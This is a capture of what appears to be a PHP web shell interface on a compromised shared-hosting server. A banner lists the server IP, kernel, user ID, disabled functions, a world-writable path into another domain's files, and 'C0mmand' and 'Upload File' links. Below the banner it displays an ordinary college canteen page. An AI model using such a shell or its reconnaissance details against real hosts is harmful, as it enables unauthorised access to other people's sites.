|
Server IP : 2a02:4780:3:2287:0:3736:a38e:8 / Your IP : 216.73.217.135 Web Server : LiteSpeed System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : system, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0777) : /home/u926327694/domains/svschool.in/../jsssakrilawcollegehubli.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include"header.php";
?>
<!-- Start Hero Area -->
<section class="hero-section height-470 bg_dark_9" style="background-image:url(assets/images/about_us.png)" data-aos="fade-up">
<div class="hero-area">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="page-hrader text-white text-center">
<h1 class="display-3">canteen Details</h1>
<div class="page-breadcrumb">
<p><a class="text-white" href="index.php">Home</a> - canteen</p>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- End Hero Area -->
<!-- Start Author Intro -->
<section class="intro-section section-ptb bg_dark_9" data-aos="fade-up">
<div class="intro-area">
<div class="container">
<div class="row">
<div class="col-sm-12" >
<div class="half_column_content">
<a href="#"> <h3>Canteen Facility</h3> <a></a>
<img class="mx-auto d-block" src="assets/images/canteen1.jpg" alt="team member" class="img-fluid" >
<p class="text-justify"> <b>
The canteen is situated within the College campus it is open for all and there is a separate sitting for staff and students. All types of healthy snacks are available at subsidized rates.s
</div>
</div>
</div>
</div>
</div>
</section>
<!-- End Author Intro -->
<?php
include"footer.php";
?>